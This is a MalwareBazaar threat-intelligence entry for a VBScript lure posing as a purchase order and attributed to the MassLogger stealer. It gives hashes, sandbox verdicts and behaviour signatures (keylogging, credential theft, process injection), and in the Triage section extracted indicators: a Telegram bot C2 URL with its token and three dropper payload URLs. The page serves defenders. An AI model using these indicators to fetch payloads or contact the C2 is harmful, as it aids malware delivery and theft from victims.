MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


MassLogger


Vendor detections: 10


Intelligence 10 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd
SHA3-384 hash: c0afdb03876b36f47a7b3181af4be59110213ddc5cb0daf8634f997fe42b30b4dcb6a0b01924aa670310f81dc1d166b8
SHA1 hash: b0c8baae8325a1a48f5de99ee366aee266b1b2e0
MD5 hash: 41d896eae343a9e3cdef7306622cd8d5
humanhash: undress-east-hamper-fourteen
File name:Purchase Order-PO25108342.vbs
Download: download sample
Signature MassLogger
Create hunting rule
File size:2'129 bytes
First seen:2025-05-27 14:58:51 UTC
Last seen:Never
File type:Visual Basic Script (vbs) vbs
MIME type:text/plain
ssdeep 24:5jH8bJzpEkbZiorkib1Io+Mda0237ap0PhAombCeBMzueWEztuUFZgawLiDYbzO/:W7EFQpqYOZmbCG6Rzk5BvWAxk9HwYL
Threatray 1'095 similar samples on MalwareBazaar
TLSH T1304153676C40D2708B62CA04935A6E58E19EF43F537085183D1CC5CE3A7DAF8A9782FB
Magika vba
Reporter abuse_ch
Tags:MassLogger vbs

Intelligence

File Origin
# of uploads :
1
# of downloads :
81
Origin country :
NL NL
Vendor Threat Intelligence
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/5865/
Detection(s):
SecuriteInfo.com.Script.SNH-gen.31996.7979.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6835d4c6acf88f5815e79bff
Tags:
dropper shell sage
Verdict:
Malicious
Labled as:
Trojan.Script.VBS
Link:
https://www.hybrid-analysis.com/sample/d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd
Result
Threat name:
MSIL Logger, MassLogger RAT
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1699920
Signature
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Contains functionality to log keystrokes (.Net Source)
Found malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell uses Background Intelligent Transfer Service (BITS)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Register Wscript In Run Key
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
VBScript performs obfuscated calls to suspicious functions
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected MalBat
Yara detected MassLogger RAT
Yara detected MSIL Logger
Yara detected Telegram RAT
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1699920 Sample: Purchase Order-PO25108342.vbs Startdate: 27/05/2025 Architecture: WINDOWS Score: 100 66 reallyfreegeoip.org 2->66 68 mail.gtit.pl 2->68 70 3 other IPs or domains 2->70 80 Sigma detected: Register Wscript In Run Key 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 88 15 other signatures 2->88 10 wscript.exe 4 2->10         started        15 wscript.exe 2->15         started        17 wscript.exe 2->17         started        signatures3 86 Tries to detect the country of the analysis system (by using the IP) 66->86 process4 dnsIp5 78 fancy-seehorse.netlify.app 54.215.62.21, 443, 49701, 49704 AMAZON-02US United States 10->78 64 C:\Users\user\AppData\...\app_update.txt, DOS 10->64 dropped 110 System process connects to network (likely due to code injection or exploit) 10->110 112 VBScript performs obfuscated calls to suspicious functions 10->112 114 Wscript starts Powershell (via cmd or directly) 10->114 116 3 other signatures 10->116 19 cmd.exe 8 10->19         started        22 powershell.exe 15->22         started        24 powershell.exe 17->24         started        file6 signatures7 process8 signatures9 90 Suspicious powershell command line found 19->90 92 Wscript starts Powershell (via cmd or directly) 19->92 26 wscript.exe 1 19->26         started        29 powershell.exe 20 19->29         started        31 powershell.exe 23 19->31         started        40 5 other processes 19->40 94 Writes to foreign memory regions 22->94 96 Injects a PE file into a foreign processes 22->96 33 AddInProcess32.exe 22->33         started        43 3 other processes 22->43 35 AddInProcess32.exe 24->35         started        38 conhost.exe 24->38         started        45 2 other processes 24->45 process10 dnsIp11 100 Wscript starts Powershell (via cmd or directly) 26->100 47 powershell.exe 26->47         started        102 Powershell uses Background Intelligent Transfer Service (BITS) 29->102 104 Loading BitLocker PowerShell Module 29->104 106 Tries to steal Mail credentials (via file / registry access) 33->106 108 Tries to harvest and steal browser information (history, passwords, etc) 33->108 76 mail.gtit.pl 89.174.231.105, 49714, 49718, 587 INTERSATPL Poland 35->76 60 C:\Users\user\AppData\...\s-nvs_update.vbs, ASCII 40->60 dropped 62 C:\Users\user\AppData\...\nvs_update.txt, Unicode 40->62 dropped file12 signatures13 process14 signatures15 118 Writes to foreign memory regions 47->118 120 Injects a PE file into a foreign processes 47->120 50 AddInProcess32.exe 47->50         started        54 conhost.exe 47->54         started        56 taskkill.exe 47->56         started        58 conhost.exe 47->58         started        process16 dnsIp17 72 checkip.dyndns.com 193.122.6.168, 49709, 49711, 49715 ORACLE-BMC-31898US United States 50->72 74 reallyfreegeoip.org 104.21.16.1, 443, 49710, 49712 CLOUDFLARENETUS United States 50->74 98 Tries to steal Mail credentials (via file / registry access) 50->98 signatures18
Score:
16%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd/
Verdict:
Malicious
Link:
https://tip.neiki.dev/file/d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-05-27 13:10:49 UTC
File Type:
Text (VBS)
AV detection:
7 of 24 (29.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=23e6nya7zvqe2hstto3vo2tda5434zbcsi74bnd2lyqpxr226loq._file
Verdict:
malicious
Label(s):
novastealer
Create hunting rule
Similar samples:
20e281548b9a3a02a258d3989215c6cbddde61f2055f2d1afe02aa3b3f22cf83
MassLogger
35bc7d58c116e83159e745ca536a9b5b0a1a4b4d25d0b8d462efd012b3c8ad21
MassLogger
3fd28257bdeaa92317003361ab95675732239e5282fde0ac2e2c7bf941ba1c98
MassLogger
830c3556d97682d080c5877a49d64b8e12c0da52e1979f9da6edcf89fb748d23
MassLogger
9756b75600b70867f99e879c1763f2225a04454688c1f8497feb8e1670ca48b2
MassLogger
ade03b33ad1a47b43d99a5eb7f469d127f98df657167c31700fd3c5cc76c522d
MassLogger
error
MassLogger
+ 1'085 additional samples on MalwareBazaar
Result
Malware family:
masslogger
Create hunting rule
Score:
  10/10
Tags:
family:masslogger execution spyware stealer
Link:
https://tria.ge/reports/250527-scvm4sep51/
Behaviour
Kills process with taskkill
Script User-Agent
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
MassLogger
Masslogger family
Malware Config
C2 Extraction:
https://api.telegram.org/bot7905958978:AAEng8Wyhv-U1eyp4jKpvi8uIC2em6irGnw/sendMessage?chat_id=7629239186
Dropper Extraction:
https://fancy-seehorse.netlify.app/code/final.txt
https://fancy-seehorse.netlify.app/code/first.txt
https://officedesk22.netlify.app/code/encodad.txt
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/5865/

Comments